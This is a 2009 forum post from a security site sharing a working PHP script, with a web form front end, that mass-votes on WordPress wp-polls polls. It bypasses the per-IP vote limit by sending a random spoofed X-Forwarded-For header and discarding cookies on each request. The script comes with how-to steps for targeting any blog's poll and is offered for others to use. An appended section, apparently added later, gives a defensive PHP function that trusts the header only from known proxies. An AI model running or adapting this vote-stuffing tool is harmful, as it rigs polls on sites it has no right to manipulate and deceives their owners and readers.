Critical Security.NET: Wordpress `wp_Polls` Post Data - Critical Security.NET


Wordpress `wp_Polls` Post Data

#1 Dr Small


Posted 20 November 2009 - 11:56 PM

This is a function I've been writing, to basically brute-force my votes onto a WordPress `wp_polls` poll. wp_polls is a plugin for WordPress, and the admin makes a poll with options, and can set restrictions on how many times a unique user can vote. I followed the theory and the clockwork behind it, and see that it is only blocking you by IP address (which I will explain in a second) and cookies.

Apparently, for some unknown reason, Wordpress checks the X-Forwarded-For header, before it does the REMOTE_ADDR. With this in mind, we can write a script to send a uniquely spoofed X-Forwarded-For header, along with our POST data to the script, of which poll is being voted on (poll_id) and which option is being selected (poll_(poll_id)).

I basically dissected the HTML form data to determine what data had to be sent via POST, and collect the cookies, but don't use them again. I think the function turned out rather well... you can check it out and use it if you like. Basically, I can enter all of the poll_ids and which option is being voted on, and specify how many times I want the function to vote on a given option (while loop).

<?php
/**
 * Copyright 2009; Dr Small
 *
 * A simple way to increase a specific number of votes on
 * a wp-polls poll. It sets a new IP in the X-Forwarded-For
 * header, every time it executes, dumps cookies to /tmp and
 * doesn't read them the next time around.
 *
 * Howto use:
 *	a) Find a Wordpress blog that uses a wp-polls poll
 *	b) Use the URL as http://domain.tld/wp-content/plugins/wp-polls/wp-polls.php
 *	c) View the page source, and find `name="poll_id" value="52"`
 *	d) Use the value as your poll_id
 *	e) Find the value of the specific poll option you want to vote on (i.e, name="poll_52" value="548")
 *	f) Specify how many votes go toward that option (with votes)
 *
 * This same kind of method could be used on almost any kind of poll
 * that does not use "user registration & activation" to vote.
 **/

/**
 * name:	Hack wp-polls
 * @param:	url		string		The URL to the plugins/wp-polls/wp-polls.php file
 * @param:	poll_id		int		The Poll ID
 * @param:	poll_value	int		The option being voted on
 * @param:	vote		int		How many times to vote on a given poll (default: 5)
 * @param:	verbose		string		How verbose to be (default: false)
 * @description:				A proof of concept way to hack wp-polls.
 **/
function hack_wp_polls($url, $poll_id, $poll_value, $vote=5, $verbose="false"){

	// Generate a four-octet random IP address
	function makeUniqueIP(){
		srand((double)microtime()*1000000); 
		$ip = rand(1,255).".".rand(0,255).".".rand(0,255).".".rand(1,255); 
		return $ip;
	}
	
	$i = 1;
	while ($i <= $vote){
		$v .= "starting loop....<br />";
		
		// Generate a unique value
		$ip = makeUniqueIP();
		$v .= "makeUniqueIP() returned $ip<br />";

		// create a new cURL resource
		$ch = curl_init();
		$v .= "opening curl resource....<br />";

		// wp-polls may be checking the IP Address of the
		// user, to make sure he doesn't send data twice;
		// send a unique IP each time (Wordpress checks X-Forwarded-For)
		$headerarray = array(
			"X-Forwarded-For: $ip");
	
		// The POST data to be sent
		$postfields = "vote=+++Vote+++&poll_id=$poll_id&poll_$poll_id=$poll_value";
		
		// set URL and other appropriate options
		curl_setopt($ch, CURLOPT_URL, $url);
		$v .= "setting CURLOPT_URL to $url<br />";
		
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_USERAGENT, "cURL bot");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headerarray);
		curl_setopt($ch, CURLOPT_POST, true);
		$v .= "setting CURLOPT_POST to true<br />";
		
		curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
		$v .= "setting CURLOPT_POSTFIELDS to $postfields<br />";
		
		curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookiefile.txt');
		$v .= "setting CURLOPT_COOKIEJAR to /tmp/cookiefile.txt<br />";

		curl_exec($ch);
		$v .= "executing curl...<br />";

		// close cURL resource, and free up system resources
		curl_close($ch);
		$v .= "closing curl resource....<br /><br /><br />";
				
		// Be verbose, if requested.
		if ($verbose == "true"){
			echo $v;
			$v = '';
		}
		$i++;
	}
}

if ($_POST[url] && $_POST[poll_id] && $_POST[option] && $_POST[verbose]){
	hack_wp_polls($_POST[url], $_POST[poll_id], $_POST[option], $_POST[votes], $_POST[verbose]);
} else {

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
	<head>
		<title>hAcK wP-p0lLz</title>
	</head>
	<body>
		<h1>hAcK wP-p0lLz</h1>
		<form action="<?php echo $_SERVER[PHP_SELF];?>" method="post">
		<table>
			<tbody>
				<tr>
					<td>URL:</td>
					<td>poll_id:</td>
					<td>option:</td>
					<td>votes:</td>
					<td>verbose:</td>
				</tr>
				<tr>
					<td><input type="text" name="url" value="" /></td>
					<td><input type="text" name="poll_id" value="" size="3"/></td>
					<td><input type="text" name="option" value="" size="3"/></td>
					<td><input type="text" name="votes" value="" size="3"/></td>
					<td><select name="verbose">
						<option value="true" selected="selected">true</option>
						<option value="false">false</option>
					</select></td>
						
				</tr>
			</tbody>
		</table>
		<input type="submit" value="Vote" />
		</form>
	</body>
</html>
<?php } ?>


An example poll can be found here, which uses the wp_polls plugin for Wordpress:
http://hsbapost.com/...-guy-blog-2009/


Dr Small
0
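The per-IP limit described in the post can be reset because a client-supplied X-Forwarded-For value is read before REMOTE_ADDR. As an added example (not part of the original post, and not wp-polls or WordPress code), this is one way to pick the address a vote limit is keyed on so that the header only counts when the request arrives from a proxy the site operates; the function names, the proxy range and the sample addresses are assumptions, and it handles IPv4 only.

```php
<?php
// Added example: not wp-polls or WordPress code. Function names, the proxy
// range and all addresses are hypothetical/constructed. IPv4 only.

// True if $ip lies inside an IPv4 CIDR block such as "10.0.0.0/8".
function ip_in_cidr(string $ip, string $cidr): bool {
    [$net, $bits] = array_pad(explode('/', $cidr, 2), 2, '32');
    $ipLong = ip2long($ip);
    $netLong = ip2long($net);
    if ($ipLong === false || $netLong === false) return false;
    $bits = max(0, min(32, (int) $bits));
    $mask = $bits === 0 ? 0 : (~0 << (32 - $bits)) & 0xFFFFFFFF;
    return ($ipLong & $mask) === ($netLong & $mask);
}

// True if $ip belongs to one of the proxy ranges the site itself operates.
function is_trusted_proxy(string $ip, array $trusted): bool {
    foreach ($trusted as $cidr) {
        if (ip_in_cidr($ip, $cidr)) return true;
    }
    return false;
}

// Address to key per-IP vote limits on.
function voter_ip(array $server, array $trusted): string {
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (!is_trusted_proxy($peer, $trusted)) {
        return $peer; // direct connection: the header is client-controlled
    }
    // Request came through our proxy: walk the chain right to left and take
    // the first hop that is not one of our own proxies.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
            return $peer; // empty or malformed entry: fall back to the TCP peer
        }
        if (!is_trusted_proxy($hop, $trusted)) return $hop;
    }
    return $peer;
}

// Constructed requests: a direct hit carrying a forged header, and one relayed
// by proxy 10.0.0.5 where the client prepended a forged entry to the chain.
$trusted = ['10.0.0.0/8'];
$samples = [
    ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '198.51.100.23'],
    ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '198.51.100.23, 203.0.113.7'],
];
foreach ($samples as $s) echo voter_ip($s, $trusted), "\n";
```

List only proxies you operate in the trusted ranges; including any range a client can connect from makes the header forgeable again.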
